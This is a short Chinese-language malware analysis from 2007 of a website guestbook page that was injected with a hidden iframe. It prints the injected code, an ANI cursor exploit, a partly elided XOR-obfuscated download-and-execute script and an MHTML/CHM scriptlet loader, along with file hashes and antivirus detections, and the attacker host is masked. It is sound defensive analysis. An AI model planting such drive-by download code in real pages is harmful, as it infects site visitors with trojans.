endurer 原创
2007-04-30 第1版
该网站的留言板页面:
/---
<Iframe id="fralyb" name="fralyb2" src="kh_lyb.aspx?user=2**5***" scrolling="auto" frameborder="0" width=100% height="100%"></iframe>
---/
被植入代码:
/---
<iframe src=hxxp://cool***.4*7*5***55.com/k3.htm width=100 height=1 frameborder=0></iframe>
---/
hxxp://cool***.4*7*5***55.com/k3.htm 包含3段恶意代码。
恶意代码段1:
/---
<DIV style="CURSOR: url(hxxp://cool***.4*7*5***55.com/9.gif)"></DIV></DIV>
---/
hxxp://cool***.4*7*5***55.com/9.gif (瑞星报为Hack.SuspiciousAni
)中包含信息:“By Mr.owen[F.S.T] ”,利用 ANI漏洞下载 xx.exe
文件说明符 : d:/test/xx.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-4-30 12:58:12
修改时间 : 2007-4-30 12:58:6
访问时间 : 2007-4-30 13:10:2
大小 : 14902 字节 14.566 KB
MD5 : 046257b53f474770dd1e2a149b2ba823
Kaspersky 报为 Trojan-Downloader.Win32.Small.eqe,瑞星报为:Trojan.DL.Inject.xz。
恶意代码段2:
/---
var J=function(m){return String.fromCharCode(m^99)};
eval(J(5)……(略)……+J(67)+'');
---/
解密结果为JavaScript脚本,功能是利用 Microsoft.XMLhttp 和 scrīpting.FileSystemObject 下载文件 kehu0739.exe,保存到%windir%,文件名由自定义函数:
/---
function gn(n){var number = Math.random()*n;
return '~tmp'+ '.tmp';}
---/
生成,即~tmp.tmp。然后通过 Shell.Application 对象Q 的 ShellExecute 方法 执行命令: %windir%/system32/cmd.exe /c %windir%/~tmp.tmp 来运行。
恶意代码段3:
/---
<OBJECT style="display:none" type="text/x-scriptlet" data="MK:@MSITStore:mhtml:c:\.mht!hxxp://cool***.4*7*5***55.com/count.html::/%6C%65%66t.htm"></OBJECT>
---/
解密后为
/---
<OBJECT style="display:none" type="text/x-scriptlet" data="MK:@MSITStore:mhtml:c:/.mht!hxxp://cool***.4*7*5***55.com/count.html::/%6C%65%66t.htm"></OBJECT>
---/
hxxp://cool***.4*7*5***55.com/count.html 其实是个CHM文件,释放并运行文件QQ.EXE
/---
文件说明符 : d:/test/QQ.EXE
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-4-30 13:39:46
修改时间 : 2007-4-30 13:39:46
访问时间 : 2007-4-30 13:41:52
大小 : 11208 字节 10.968 KB
MD5 : f04973fb8267827f347594b373732290
nSPack 1.3 -> North Star/Liu Xing Ping
---/
瑞星报为:Trojan.DL.Agent.alw
|
Scanned file: QQ.EXE - Infected |
QQ.EXE - infected by Trojan-Downloader.Win32.Agent.ue Statistics:
|